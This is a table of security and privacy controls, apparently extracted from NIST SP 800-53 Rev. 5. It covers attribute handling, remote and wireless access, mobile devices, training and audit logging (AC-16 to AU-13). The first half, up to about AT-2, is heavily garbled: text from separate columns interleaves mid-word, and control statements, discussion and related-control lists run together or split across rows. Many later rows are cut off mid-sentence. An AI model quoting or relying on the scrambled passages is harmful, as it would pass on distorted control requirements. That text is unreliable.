(e.g., files, individual
emails). The users (asand
association opposedtablets. to To
themitigate
of attributes system)
by full
the risk of
to maintain
authorized None.
handling,
security aandor distribution instructions]
privacy attributes] using
withof[Assignment:[Assignment: organization-defined human-readable, unauthorized exposure of information (e.g., shoulder surfing), the outputs display attribute
AC-16(7) Security and Privacy Attributes | Consistent Attribute Interpretation Provide
standard consistent
naming interpretation
conventions]. security andorganization-defined subjects and
privacy attributes transmitted objects] in
between associations
To enforce
values
of defined
whensecurity
unmasked andsecurity
privacy
by
and privacy
policies
the subscriber. across attributes
multiplewith systemsubjects
componentsand objects.in distributed systems, None.
accordance
distributed with [Assignment:
system components. organization-defined security and privacy policies]. organizations provide a consistent interpretation of security and privacy attributes employed in
AC-16(8) Security and Privacy Attributes | Association Techniques and Technologies Implement [Assignment: organization-defined techniques and technologies] in associating security andThe association of security and privacy attributes to information within systems is important for conducting SC-12, SC-13.
automated access enforcement and flow enforcement actions. The association of such attributes
access enforcement and flow enforcement decisions. Organizations can establish agreements and
AC-16(9) Security and Privacy Attributes | Attribute Reassignment — Regrading Mechanisms Change security and privacy attributes associated with information only via regrading mechanisms processes A regradingtomechanism
help ensureisthat a trusted
distributedprocess authorized
system components to re-classify
implement and re-label
attributes data in accordance
with consistent None.
AC-16(10) Security and Privacy Attributes | Attribute Configuration by Authorized Individuals validated using [Assignment:
Provide authorized individualsorganization-defined
the capability to define techniques
or change or the
procedures].
type and value of security and with a defined
The content or policy
assigned exception.
values ofValidated
security regrading
and privacy mechanisms
attributes can are directly
used byaffectorganizations
the ability toof None.
privacy attributes availableusage for association with subjects and objects. requirements, and provide theto
individuals requisite
access levels of assurance
organizational for attribute
information. reassignment activities. Theto validation is limit
AC-17 Remote Access a. Establish and document restrictions, configuration/connection Remote
facilitatedaccess is access
by create
ensuring to organizational systemsThus, it is important
(or processes actingfor onsystems
behalf be ablethat
of users) to commAC-2, AC-3, AC-4, AC-18, AC-19, AC-20, CA-3, CM-10, IA-2, IA-3, IA-8, MA-4, PE-17, PL-2,
implementation guidance for each the ability to or that
modify regrading
the typemechanismsand value ofare single purpose
attributes available and forofassociation
limited function.
with Since PL-4, SC-10, SC-12, SC-13, SI-4.
AC-17(1) Remote Access | Monitoring and Control Employ automated mechanisms to type
monitorof remote accessremote
and control allowed; and methods.
access Monitoring
subjects andand control
objects of remote access
to authorized individuals methods only.allows organizations to detect attacks and help ensAU-2, AU-6, AU-12, AU-14.
AC-17(2) Remote Access | Protection of Confidentiality and Integrity Using Encryption Implement cryptographic mechanisms to protect the confidentiality and integrity of remote access seVirtual private networks can be used to protect the confidentiality and integrity of remote access s SC-8, SC-12, SC-13.
AC-17(3) Remote Access | Managed Access Control Points Route remote accesses through authorized and managed network access control points. Organizations consider the Trusted Internet Connections (TIC) initiative DHS TIC requirements for extSC-7.
AC-17(4) Remote Access | Privileged Commands and Access (a) Authorize the execution of privileged commands and access to security-relevant information via Remote access to systems represents a significant potential vulnerability that can be exploited by advAC-6, SC-12, SC-13.
AC-19(3) Access Control for Mobile Devices | Use of Portable Storage Devices with No Identifiable Owner remote access only in a format
[Withdrawn: Incorporated into MP-7.] that provides assessable evidence and for the following needs:
[Assignment: organization-defined needs]; and
AC-17(6) Remote Access | Protection of Mechanism Information Protect information about remote access mechanisms from unauthorized use and disclosure. Remote access to organizational information by non-organizational entities can increase the risk of AT-2, AT-3, PS-6.
AC-2(10) Account Management | Shared and Group Account Credential Change [Withdrawn: Incorporated into AC-2k.]
AC-3(1) Access Enforcement | Restricted Access to Privileged Functions [Withdrawn: Incorporated into AC-6.]
AC-17(9) Remote Access | Disconnect or Disable Access Provide the capability to disconnect or disable remote access to the system within [Assignment: The speed of system disconnect or disablement varies based on the criticality of missions or None.
AC-17(10) Remote Access | Authenticate Remote Commands organization-defined
Implement [Assignment: timeorganization-defined
period]. mechanisms] to authenticate [Assignment: organizat business functions
Authenticating remote and commands
the need toprotects eliminateagainst immediate or futurecommands
unauthorized remote access and to thesystems.
replay of authorize SC-12, SC-13, SC-23.
AC-18 Wireless Access a. Establish configuration requirements, connection requirements, and implementation guidance Wireless technologies include microwave, packet radio (ultra-high frequency or very high frequency) AC-2, AC-3, AC-17, AC-19, CA-9, CM-7, IA-2, IA-3, IA-8, PL-4, SC-40, SC-43, SI-4.
AC-18(1) Wireless Access | Authentication and Encryption for eachwireless
Protect type of wireless
access toaccess;
the system and using authentication of [Selection (one or more): users; devicesWireless networking capabilities represent a significant potential vulnerability that can be exploited SC-8, SC-12, SC-13.
AC-3(6) Access Enforcement | Protection of User and System Information [Withdrawn: Incorporated into MP-4 and SC-28.]
AC-18(3) Wireless Access | Disable Wireless Networking Disable, when not intended for use, wireless networking capabilities embedded within system Wireless networking capabilities that are embedded within system components represent a None.
AC-18(4) Wireless Access | Restrict Configurations by Users components prior to issuance
Identify and explicitly authorizeand usersdeployment.
allowed to independently configure wireless networking capabilsignificant Organizational potential vulnerability
authorizations that can
to allow be exploited
selected users toby adversaries.
configure Disabling
wireless wireless
networking capabilities SC-7, SC-15.
capabilities when not needed for essential organizational missions or functions can reduce
AC-18(5) Wireless Access | Antennas and Transmission Power Levels Select radio antennas and calibrate transmission power levels to reduce the probability that signals susceptibility Actions that may be taken
to threats by to limit unauthorized
adversaries involving use of wireless
wireless communications outside of organizatio
technologies. PE-19.
AC-19 Access Control for Mobile Devices a. Establish configuration requirements, connection requirements, and implementation guidance A mobile device is a computing device that has a small form factor such that it can easily be carried AC-3, AC-4, AC-7, AC-11, AC-17, AC-18, AC-20, CA-9, CM-2, CM-6, IA-2, IA-3, MP-2, MP-4,
AC-4(16) Information Flow Enforcement | Information Transfers on Interconnected Systems for organization-controlled
[Withdrawn: Incorporated into mobile AC-4.]devices, to include when such devices are outside of controlled by a single individual; is designed to operate without a physical connection; possesses local, non- MP-5, MP-7, PL-4, SC-7, SC-34, SC-43, SI-3, SI-4.
areas; and removable or removable data storage; and includes a self-contained power source. Mobile device
AC-4(18) Information Flow Enforcement | Security Attribute Binding [Withdrawn: Incorporated into AC-16.] functionality may also include voice communication capabilities, on-board sensors that allow the
AC-7(1) Unsuccessful Logon Attempts | Automatic Account Lock [Withdrawn: Incorporated into AC-7.]
AC-19(4) Access Control for Mobile Devices | Restrictions for Classified Information (a) Prohibit the use of unclassified mobile devices in facilities containing systems processing, None. CM-8, IR-4.
AC-19(5) Access Control for Mobile Devices | Full Device or Container-based Encryption storing, or transmitting
Employ [Selection: classified
full-device information
encryption; unless specifically
container-based permitted
encryption] by the authorizing
to protect the confidentiality Container-based encryption provides a more fine-grained approach to data and information encryption SC-12,
o SC-13, SC-28.
official; and
AC-20 Use of External Systems a. [Selection (one or more): Establish [Assignment: organization-defined terms and conditions]; External systems are systems that are used by but not part of organizational systems, and for which AC-2, AC-3, AC-17, AC-19, CA-3, PL-2, PL-4, SA-9, SC-7.
AC-20(1) Use of External Systems | Limits on Authorized Use Identifyauthorized
Permit [Assignment: organization-defined
individuals to use an external controls asserted
system to bethe
to access implemented
system or toonprocess,
externalstore, or the organization
Limiting authorized hasuse no recognizes
direct control over the implementation
circumstances where individuals of required controlssystems
using external or the may needCA-2.
systems]],organization-controlled
transmit consistent with the trust relationships
information onlyestablished
after: with other organizations owning, assessment of control effectiveness. External systems include personally owned systems,
AC-20(2) Use of External Systems | Portable Storage Devices — Restricted Use Restrict theand/or
operating, use of maintaining
organization-controlled
external systems, portable storage
allowing devices by
authorized authorized
individuals to:individuals on exteLimits on the use
components, of organization-controlled
or devices; privately owned computing portable and storage devices in external
communications devices systems include re
in commercial or MP-7, SC-41.
AC-20(3) Use of External Systems | Non-organizationally Owned Systems — Restricted Use Restrict the use of non-organizationally owned systems or system components to process, store, or Non-organizationally owned systems or system components include systems or system components None.
AC-20(4) Use of External Systems | Network Accessible Storage Devices — Prohibited Use transmitthe
Prohibit organizational information
use of [Assignment: using [Assignment:network
organization-defined organization-defined
accessible storage restrictions].
devices] in owned by other organizations
Network-accessible storage devices as wellinas personally
external owned
systems devices.
include online There are potential
storage devices inrisks to
public, None.
external systems. using non-organizationally owned systems systems.orportable components. In some cases, the risk is sufficiently high
AC-20(5) Use of External Systems | Portable Storage Devices — Prohibited Use Prohibit the use of organization-controlled portable storage devices by authorized individuals on ext hybrid, Limits
as
orthe
on
to prohibit
community
use
suchofuse
cloud-based
organization-controlled
(see AC-20 b.). In other cases, storage
the use of devices in external
such systems systems include a c MP-7, PL-4, PS-6, SC-41.
or system
AC-21 Information Sharing a. Enable authorized users to determine whether access authorizations assigned to a sharing Information sharing applies to information that may be restricted in some manner based on some forma AC-3, AC-4, AC-16, PT-2, PT-7, RA-3, SC-15.
AC-21(1) Information Sharing | Automated Decision Support partner match the information’s
Employ [Assignment: access andautomated
organization-defined use restrictions for [Assignment:
mechanisms] to enforce organization-defined
information-sharing Automated mechanisms are used to enforce information sharing decisions. None.
information
decisions sharing
byinformation
authorized circumstances
users based where user authorizations
on access discretion is required];
of sharing and partnersorganization-
and access
AC-21(2) Information Sharing | Information Search and Retrieval Implement search and retrieval services that enforce [Assignment: Information search and retrieval services identify information system resources relevant to an None.
restrictions
defined on information
information sharing torestrictions].
be shared. information need.
AC-22 Publicly Accessible Content a. Designate individuals authorized to make information publicly accessible; In accordance with applicable laws, executive orders, directives, policies, regulations, standards, a AC-3, AT-2, AT-3, AU-13.
AC-23 Data Mining Protection b. Train authorized individuals to ensure that publicly accessible information does not contain
Employ [Assignment: organization-defined data mining prevention and detection techniques] for [AssData mining is an analytical process that attempts to find correlations or patterns in large data sets PM-12, PT-2.
nonpublic information; for the control
purposedecisions
of data or knowledge discovery. Data storage objects
AC-24 Access Control Decisions [Selection: Establish procedures; Implement mechanisms] to ensure [Assignment: organization-defined Access (also known as authorization decisions) occurinclude database records
when authorization and AC-2, AC-3.
informatio
database fields. Sensitive information can be extracted from data mining operations. When
AC-24(1) Access Control Decisions | Transmit Access Authorization Information Transmit [Assignment: organization-defined access authorization information] using [Assignment: orginformation Authorization is processes
personallyand access control
identifiable information,decisions it maymaylead occur to in separate parts
unanticipated of systems
revelations or in sepAU-10.
about
AC-24(2) Access Control Decisions | No User or Process Identity Enforce access control decisions based on [Assignment: organization-defined security or privacy In certain situations, it is important that access control decisions can be made without information None.
AC-25 Reference Monitor attributes]
Implement that do not include
a reference monitorthe foridentity of the organization-defined
[Assignment: user or process actingaccess on behalf of the
control user. that is regarding
policies] A reference the identityisof
monitor theof
a set users
design issuing the requests.
requirements on aThese
referenceare generally
validationinstances
mechanism where that, as a keAC-3, AC-16, SA-8, SA-17, SC-3, SC-11, SC-39, SI-13.
preserving individual privacy is of paramount importance. In other situations, user identification
AT-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: information Awareness and training
is simply notpolicy
needed andfor procedures
access control address the controls
decisions, in the AT in
and especially family
the casethat ofare implement PM-9, PS-8, SI-12.
AT-2 Literacy Training and Awareness 1. Provide
a. [Selection (one orand
security more):
privacy Organization-level;
literacy training to Mission/business process-level;
system users (including System-level]
managers, senior Organizations provide basic and advanced levels of literacy training to system users, including AC-3, AC-17, AC-22, AT-3, AT-4, CP-3, IA-4, IR-2, IR-7, IR-9, PL-4, PM-13, PM-21, PS-7, PT-
awareness and
executives, andtraining policy that:
contractors): measures to test the knowledge levelsocial
of users. Organizations determine the content of literacy 2, SA-8, SA-16.
AT-2(1) Literacy Training and Awareness | Practical Exercises Provide practical exercises in literacy training that simulate events and incidents. Practical exercises include no-notice engineering attempts to collect information, gain unauthoCA-2, CA-7, CP-4, IR-3.
training and awareness based on specific organizational requirements, the systems to which
AT-2(2) Literacy Training and Awareness | Insider Threat Provide literacy training on recognizing and reporting potential indicators of insider threat. Potential indicators
personnel have authorized and possible
access, precursors
and work of insider threat(e.g.,
environments can telework).
include behaviorsThe content such includes
as inordin an PM-12.
AT-2(3) Literacy Training and Awareness | Social Engineering and Mining Provide literacy training on recognizing and reporting potential and actual instances of social Social engineering is an attempt to trick an individual into revealing information or taking an action None.
AT-2(4) Literacy Training and Awareness | Suspicious Communications and Anomalous System Behavior engineering
Provide literacyandtraining
social mining.
on recognizing suspicious communications and anomalous behavior in that can be used
A well-trained to breach,
workforce compromise,
provides anotherororganizational
otherwise adversely controlimpactthat can a system.
be employed Socialas part of a None.
organizational engineering includes phishing, pretexting, impersonation, baiting, quid pro quo, thread-jacking,
AT-2(5) Literacy Training and Awareness | Advanced Persistent Threat Provide literacysystems
trainingusingon the [Assignment: organization-defined
advanced persistent threat. indicators of malicious code]. defense-in-depth
An effective
social media way strategy
to detectand
exploitation,
to protect
advanced
tailgating.
against
persistent
Social
malicious
threatsis
mining
code
(APT) coming
and to into
an attempt
organizations
preclude
to gathersuccessful
information
via email is
attacks
about
orto None.
the web
provide applications.
specific Personnel
literacytotraining are trained to look for indications of potentially suspicious email
AT-2(6) Literacy Training and Awareness | Cyber Threat Environment (a) Provide literacy training on the cyber threat environment; and Since receiving
(e.g., threats continue
(b) Reflect current cyber threat information in system operations.	over time, threat literacy training by the organization is dynamic. M	RA-3.
	an unexpected change email, receiving an email containing strange or poor grammar,
	for individuals. Threat literacy training includes educating individuals on the various ways that APTs can infiltrate the organization (e.g., through websites, emails, advertisement pop-ups, articles, and social engineering). Effective training includes
AT-3	Role-based Training	a. Provide role-based security and privacy training to personnel with the following roles and responsibilities: [Assignment: organization-defined roles and responsibilities]:	Organizations determine the content of training based on the assigned roles and responsibilities of individuals as well as the security and privacy requirements of organizations and the systems to which personnel have authorized access, including technical training specifically tailored for assigned duties. Roles that may require role-based training include senior leaders or management	AC-3, AC-17, AC-22, AT-2, AT-4, CP-3, IR-2, IR-4, IR-7, IR-9, PL-4, PM-13, PM-23, PS-7, PS-9, SA-3, SA-8, SA-11, SA-16, SR-5, SR-6, SR-11.
AT-3(1)	Role-based Training | Environmental Controls	Provide [Assignment: organization-defined personnel or roles] with initial and [Assignment: organiz	Environmental controls include fire suppression and detection devices or systems, sprinkler systems,	PE-1, PE-11, PE-13, PE-14, PE-15.
AT-3(2)	Role-based Training | Physical Security Controls	Provide [Assignment: organization-defined personnel or roles] with initial and [Assignment: organiza	Physical security controls include physical access control devices, physical intrusion and detection al	PE-2, PE-3, PE-4.
AT-3(3)	Role-based Training | Practical Exercises	Provide practical exercises in security and privacy training that reinforce training objectives.	Practical exercises for security include training for software developers that addresses simulated attacks that exploit common software vulnerabilities or spear or whale phishing attacks targeted at senior leaders or executives. Practical exercises for privacy include modules with quizzes on identifying and processing personally identifiable information in various scenarios or scenarios on	None.
AT-3(4)	Role-based Training | Suspicious Communications and Anomalous System Behavior	[Withdrawn: Moved to AT-2(4)].
AT-3(5)	Role-based Training | Processing Personally Identifiable Information	Provide [Assignment: organization-defined personnel or roles] with initial and [Assignment: organiza	Personally identifiable information processing and transparency controls include the organization’s	PT-2, PT-3, PT-5, PT-6.
AT-4	Training Records	a. Document and monitor information security and privacy training activities, including security and privacy awareness training and specific role-based security and privacy training; and	Documentation for specialized training may be maintained by individual supervisors at the discretion	AT-2, AT-3, CP-3, IR-2, PM-14, SI-12.
AT-5	Contacts with Security Groups and Associations	[Withdrawn: Incorporated into PM-15.]
AT-6	Training Feedback	Provide feedback on organizational training results to the following personnel [Assignment: organization-defined frequency]: [Assignment: organization-defined personnel].	Training feedback includes awareness training results and role-based training results. Training results, especially failures of personnel in critical roles, can be indicative of a potentially serious problem. Therefore, it is important that senior managers are made aware of such situations so that they can take appropriate response actions. Training feedback supports the evaluation and update	None.
AU-1	Policy and Procedures	a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] audit and accountability policy that:	Audit and accountability policy and procedures address the controls in the AU family that are impleme	PM-9, PS-8, SI-12.
AU-2	Event Logging	a. Identify the types of events that the system is capable of logging in support of the audit function: [Assignment: organization-defined event types that the system is capable of logging];	An event is an observable occurrence in a system. The types of events that require logging are those events that are significant and relevant to the security of systems and the privacy of individuals. Event logging also supports specific monitoring and auditing needs. Event types include password changes, failed logons or failed accesses related to systems, security or privacy attribute	AC-2, AC-3, AC-6, AC-7, AC-8, AC-16, AC-17, AU-3, AU-4, AU-5, AU-6, AU-7, AU-11, AU-12, CM-3, CM-5, CM-6, CM-13, IA-3, MA-4, MP-4, PE-3, PM-21, PT-2, PT-7, RA-8, SA-8, SC-7, SC-18, SI-3, SI-4, SI-7, SI-10, SI-11.
AU-10(5)	Non-repudiation | Digital Signatures	[Withdrawn: Incorporated into SI-7.]
AU-14(2)	Session Audit | Capture and Record Content	[Withdrawn: Incorporated into AU-14.]
AU-15 Alternate Audit Logging Capability [Withdrawn: Moved to AU-5(5).]
AU-2(1) Event Logging | Compilation of Audit Records from Multiple Sources [Withdrawn: Incorporated into AU-12.]
AU-3	Content of Audit Records	Ensure that audit records contain information that establishes the following: a. What type of event occurred;	Audit record content that may be necessary to support the auditing function includes event descriptions	AU-2, AU-8, AU-12, AU-14, MA-4, PL-9, SA-8, SI-7, SI-11.
AU-3(1)	Content of Audit Records | Additional Audit Information	Generate audit records containing the following additional information: [Assignment: organization-defined additional information].	The ability to add information generated in audit records is dependent on system functionality to configure the audit record content. Organizations may consider additional information in audit records including, but not limited to, access control or flow control rules invoked and individual identities of group account users. Organizations may also consider limiting additional audit record	None.
AU-2(2)	Event Logging | Selection of Audit Events by Component	[Withdrawn: Incorporated into AU-12.]
AU-3(3)	Content of Audit Records | Limit Personally Identifiable Information Elements	Limit personally identifiable information contained in audit records to the following elements identif	Limiting personally identifiable information in audit records when such information is not needed for	RA-3.

AU-4	Audit Log Storage Capacity	Allocate audit log storage capacity to accommodate [Assignment: organization-defined audit log rete	Organizations consider the types of audit logging to be performed and the audit log processing requirem	AU-2, AU-5, AU-6, AU-7, AU-9, AU-11, AU-12, AU-14, SI-4.
AU-4(1)	Audit Log Storage Capacity | Transfer to Alternate Storage	Transfer audit logs [Assignment: organization-defined frequency] to a different system, system component, or media other than the system or system component conducting the logging.	Audit log transfer, also known as off-loading, is a common process in systems with limited audit log storage capacity and thus supports availability of the audit logs. The initial audit log storage is only used in a transitory fashion until the system can communicate with the secondary or alternate system allocated to audit log storage, at which point the audit logs are transferred. Transferring	None.
AU-5	Response to Audit Logging Process Failures	a. Alert [Assignment: organization-defined personnel or roles] within [Assignment: organization-defined time period] in the event of an audit logging process failure; and	Audit logging process failures include software and hardware errors, failures in audit log capturing me	AU-2, AU-4, AU-7, AU-9, AU-11, AU-12, AU-14, SI-4, SI-12.
AU-5(1)	Response to Audit Logging Process Failures | Storage Capacity Warning	Provide a warning to [Assignment: organization-defined personnel, roles, and/or locations] within [Assignment: organization-defined time period] when allocated audit log storage volume reaches [Assignment: organization-defined percentage] of repository maximum audit log storage capacity.	Organizations may have multiple audit log storage repositories distributed across multiple system components with each repository having different storage volume capacities.	None.
AU-5(2)	Response to Audit Logging Process Failures | Real-time Alerts	Provide an alert within [Assignment: organization-defined real-time period] to [Assignment: organization-defined personnel, roles, and/or locations] when the following audit failure events occur: [Assignment: organization-defined audit logging failure events requiring real-time alerts].	Alerts provide organizations with urgent messages. Real-time alerts provide these messages at information technology speed (i.e., the time from event detection to alert occurs in seconds or less).	None.
AU-5(3)	Response to Audit Logging Process Failures | Configurable Traffic Volume Thresholds	Enforce configurable network communications traffic volume thresholds reflecting limits on audit log storage capacity and [Selection: reject; delay] network traffic above those thresholds.	Organizations have the capability to reject or delay the processing of network communications traffic if audit logging information about such traffic is determined to exceed the storage capacity of the system audit logging function. The rejection or delay response is triggered by the established organizational traffic volume thresholds that can be adjusted based on changes to audit log storage	None.
AU-5(4)	Response to Audit Logging Process Failures | Shutdown on Failure	Invoke a [Selection: full system shutdown; partial system shutdown; degraded operational mode with lim	Organizations determine the types of audit logging failures that can trigger automatic system shutdo	AU-15.
AU-5(5)	Response to Audit Logging Process Failures | Alternate Audit Logging Capability	Provide an alternate audit logging capability in the event of a failure in primary audit logging capabi	Since an alternate audit logging capability may be a short-term protection solution employed until the	AU-9.
log storage
AU-6 Audit Record Review, Analysis, and Reporting a. Review and analyze system audit records [Assignment: organization-defined frequency] for Audit record review, analysis, and reporting covers information security- and privacy-related loggin AC-2, AC-3, AC-5, AC-6, AC-7, AC-17, AU-7, AU-16, CA-2, CA-7, CM-2, CM-5, CM-6, CM-10,
AU-6(1) Audit Record Review, Analysis, and Reporting | Automated Process Integration indications
Integrate audit of [Assignment:
record review, organization-defined
analysis, and reporting inappropriate
processesor unusual
using activity] and
[Assignment: the
organization-d Organizational processes that benefit from integrated audit record review, analysis, and reporting in CM-11, PM-7. IA-2, IA-3, IA-5, IA-8, IR-5, MA-4, MP-4, PE-3, PE-6, RA-5, SA-8, SC-7, SI-3, SI-4, SI-
potential impact of the inappropriate or unusual activity; 7.
AU-2(3) Event Logging | Reviews and Updates [Withdrawn: Incorporated into AU-2.]
AU-6(3)	Audit Record Review, Analysis, and Reporting | Correlate Audit Record Repositories	Analyze and correlate audit records across different repositories to gain organization-wide situation	Organization-wide situational awareness includes awareness across all three levels of risk management	AU-12, IR-4.
AU-6(4)	Audit Record Review, Analysis, and Reporting | Central Review and Analysis	Provide and implement the capability to centrally review and analyze audit records from multiple co	Automated mechanisms for centralized reviews and analyses include Security Information and Even	AU-2, AU-12.
AU-6(5)	Audit Record Review, Analysis, and Reporting | Integrated Analysis of Audit Records	Integrate analysis of audit records with analysis of [Selection (one or more): vulnerability scanning	Integrated analysis of audit records does not require vulnerability scanning, the generation of perfor	AU-12, IR-4.
AU-6(6)	Audit Record Review, Analysis, and Reporting | Correlation with Physical Monitoring	Correlate information from audit records with information obtained from monitoring physical access to further enhance the ability to identify suspicious, inappropriate, unusual, or malevolent activity.	The correlation of physical audit record information and the audit records from systems may assist organizations in identifying suspicious behavior or supporting evidence of such behavior. For example, the correlation of an individual’s identity for logical access to certain systems with the additional physical security information that the individual was present at the facility when	None.
AU-6(7)	Audit Record Review, Analysis, and Reporting | Permitted Actions	Specify the permitted actions for each [Selection (one or more): system process; role; user] associated with the review, analysis, and reporting of audit record information.	Organizations specify permitted actions for system processes, roles, and users associated with the review, analysis, and reporting of audit records through system account management activities. Specifying permitted actions on audit record information is a way to enforce the principle of least privilege. Permitted actions are enforced by the system and include read, write, execute, append,	None.
AU-6(8)	Audit Record Review, Analysis, and Reporting | Full Text Analysis of Privileged Commands	Perform a full text analysis of logged privileged commands in a physically distinct component or subsy	Full text analysis of privileged commands requires a distinct environment for the analysis of the audit r	AU-3, AU-9, AU-11, AU-12.
AU-6(9)	Audit Record Review, Analysis, and Reporting | Correlation with Information from Nontechnical Sour	Correlate information from nontechnical sources with audit record information to enhance organizat	Nontechnical sources include records that document organizational policy violations related to harassm	PM-12.
AU-2(4) Event Logging | Privileged Functions [Withdrawn: Incorporated into AC-6(9).]
AU-7	Audit Record Reduction and Report Generation	Provide and implement an audit record reduction and report generation capability that: a. Supports on-demand audit record review, analysis, and reporting requirements and after-the-fact investigations of incidents; and	Audit record reduction is a process that manipulates collected audit log information and organizes it	AC-2, AU-2, AU-3, AU-4, AU-5, AU-6, AU-12, AU-16, CM-5, IA-5, IR-4, PM-12, SI-4.
AU-7(1)	Audit Record Reduction and Report Generation | Automatic Processing	Provide and implement the capability to process, sort, and search audit records for events of interest based on the following content: [Assignment: organization-defined fields within audit records].	Events of interest can be identified by the content of audit records, including system resources involved, information objects accessed, identities of individuals, event types, event locations, event dates and times, Internet Protocol addresses involved, or event success or failure. Organizations may define event criteria to any degree of granularity required, such as locations selectable by a	None.
AU-3(2)	Content of Audit Records | Centralized Management of Planned Audit Record Content	[Withdrawn: Incorporated into PL-9.]
AU-8	Time Stamps	a. Use internal system clocks to generate time stamps for audit records; and b. Record time stamps for audit records that meet [Assignment: organization-defined granularity of time measurement] and that use Coordinated Universal Time, have a fixed local time offset from Coordinated Universal Time, or that include the local time offset as part of the time stamp.	Time stamps generated by the system include date and time. Time is commonly expressed in Coordinated	AU-3, AU-12, AU-14, SC-45.
AU-6(10)	Audit Record Review, Analysis, and Reporting | Audit Level Adjustment	[Withdrawn: Incorporated into AU-6.]
AU-6(2)	Audit Record Review, Analysis, and Reporting | Automated Security Alerts	[Withdrawn: Incorporated into SI-4.]
AU-9	Protection of Audit Information	a. Protect audit information and audit logging tools from unauthorized access, modification, and deletion; and	Audit information includes all information needed to successfully audit system activity, such as audit	AC-3, AC-6, AU-6, AU-11, AU-14, AU-15, MP-2, MP-4, PE-2, PE-3, PE-6, SA-8, SC-8, SI-4.
AU-9(1)	Protection of Audit Information | Hardware Write-once Media	Write audit trails to hardware-enforced, write-once media.	Writing audit trails to hardware-enforced, write-once media applies to the initial generation of audit	AU-4, AU-5.
AU-9(2)	Protection of Audit Information | Store on Separate Phys<br>ical Systems or Components	Store audit records [Assignment: organization-defined frequency] in a repository that is part of a p	Storing audit records in a repository separate from the audited system or system component helps to	AU-4, AU-5.
AU-9(3)	Protection of Audit Information | Cryptographic Protection	Implement cryptographic mechanisms to protect the integrity of audit information and audit tools.	Cryptographic mechanisms used for protecting the integrity of audit information include signed hash f	AU-10, SC-12, SC-13.
AU-9(4)	Protection of Audit Information | Access by Subset of Privileged Users	Authorize access to management of audit logging functionality to only [Assignment: organization-defin	Individuals or roles with privileged access to a system and who are also the subject of an audit by that	AC-5.
AU-9(5)	Protection of Audit Information | Dual Authorization	Enforce dual authorization for [Selection (one or more): movement; deletion] of [Assignment: organiz	Organizations may choose different selection options for different types of audit information. Dual	AC-3.
AU-9(6)	Protection of Audit Information | Read-only Access	Authorize read-only access to audit information to [Assignment: organization-defined subset of privileged users or roles].	Restricting privileged user or role authorizations to read-only helps to limit the potential damage to organizations that could be initiated by such users or roles, such as deleting audit records to cover up malicious activity.	None.
AU-9(7)	Protection of Audit Information | Store on Component with Different Operating System	Store audit information on a component running a different operating system than the system or co	Storing auditing information on a system component running a different operating system reduces r	AU-4, AU-5, AU-11, SC-29.
AU-10	Non-repudiation	Provide irrefutable evidence that an individual (or process acting on behalf of an individual) has pe	Types of individual actions covered by non-repudiation include creating information, sending and rec	AU-9, PM-12, SA-8, SC-8, SC-12, SC-13, SC-16, SC-17, SC-23.
AU-10(1)	Non-repudiation | Association of Identities	(a) Bind the identity of the information producer with the information to [Assignment: organization-defined strength of binding]; and	Binding identities to the information supports audit requirements that provide organizational person	AC-4, AC-16.
AU-10(2)	Non-repudiation | Validate Binding of Information Producer Identity	(a) Validate the binding of the information producer identity to the information at [Assignment: organization-defined frequency]; and	Validating the binding of the information producer identity to the information prevents the modifica	AC-3, AC-4, AC-16.
AU-10(3)	Non-repudiation | Chain of Custody	Maintain reviewer or releaser credentials within the established chain of custody for information rev	Chain of custody is a process that tracks the movement of evidence through its collection, safeguardi	AC-4, AC-16.
AU-10(4)	Non-repudiation | Validate Binding of Information Reviewer Identity	(a) Validate the binding of the information reviewer identity to the information at the transfer or release points prior to release or transfer between [Assignment: organization-defined security domains]; and	Validating the binding of the information reviewer identity to the information at transfer or release	AC-4, AC-16.
AU-7(2)	Audit Record Reduction and Report Generation | Automatic Sort and Search	[Withdrawn: Incorporated into AU-7(1).]
AU-11	Audit Record Retention	Retain audit records for [Assignment: organization-defined time period consistent with records retent	Organizations retain audit records until it is determined that the records are no longer needed for a	AU-2, AU-4, AU-5, AU-6, AU-9, AU-14, MP-6, RA-5, SI-12.
AU-11(1)	Audit Record Retention | Long-term Retrieval Capability	Employ [Assignment: organization-defined measures] to ensure that long-term audit records generated by the system can be retrieved.	Organizations need to access and read audit records requiring long-term storage (on the order of years). Measures employed to help facilitate the retrieval of audit records include converting records to newer formats, retaining equipment capable of reading the records, and retaining the necessary documentation to help personnel understand how to interpret the records.	None.
AU-12	Audit Record Generation	a. Provide audit record generation capability for the event types the system is capable of auditing as defined in AU-2a on [Assignment: organization-defined system components];	Audit records can be generated from many different system components. The event types specified in	AC-6, AC-17, AU-2, AU-3, AU-4, AU-5, AU-6, AU-7, AU-14, CM-5, MA-4, MP-4, PM-12, SA-8, SC-18, SI-3, SI-4, SI-7, SI-10.
AU-12(1)	Audit Record Generation | System-wide and Time-correlated Audit Trail	Compile audit records from [Assignment: organization-defined system components] into a system-wide (lo	Audit trails are time-correlated if the time stamps in the individual audit records can be reliably rela	AU-8, SC-45.
AU-12(2)	Audit Record Generation | Standardized Formats	Produce a system-wide (logical or physical) audit trail composed of audit records in a standardized format.	Audit records that follow common standards promote interoperability and information exchange between devices and systems. Promoting interoperability and information exchange facilitates the production of event information that can be readily analyzed and correlated. If logging mechanisms do not conform to standardized formats, systems may convert individual audit records into	None.
AU-12(3)	Audit Record Generation | Changes by Authorized Individuals	Provide and implement the capability for [Assignment: organization-defined individuals or roles] to	Permitting authorized individuals to make changes to system logging enables organizations to extend or	AC-3.
AU-12(4)	Audit Record Generation | Query Parameter Audits of Personally Identifiable Information	Provide and implement the capability for auditing the parameters of user query events for data sets containing personally identifiable information.	Query parameters are explicit criteria that an individual or automated system submits to a system to retrieve data. Auditing of query parameters for datasets that contain personally identifiable information augments the capability of an organization to track and understand the access, usage, or sharing of personally identifiable information by authorized personnel.	None.
AU-13	Monitoring for Information Disclosure	a. Monitor [Assignment: organization-defined open-source information and/or information sites] [Assignment: organization-defined frequency] for evidence of unauthorized disclosure of organizational information; and	Unauthorized disclosure of information is a form of data leakage. Open-source information includes s	AC-22, PE-3, PM-12, RA-5, SC-7, SI-20.
AU-13(1)	Monitoring for Information Disclosure | Use of Automated Tools	Monitor open-source information and information sites using [Assignment: organization-defined automated mechanisms].	Automated mechanisms include commercial services that provide notifications and alerts to organizations and automated scripts to monitor new posts on websites.	None.
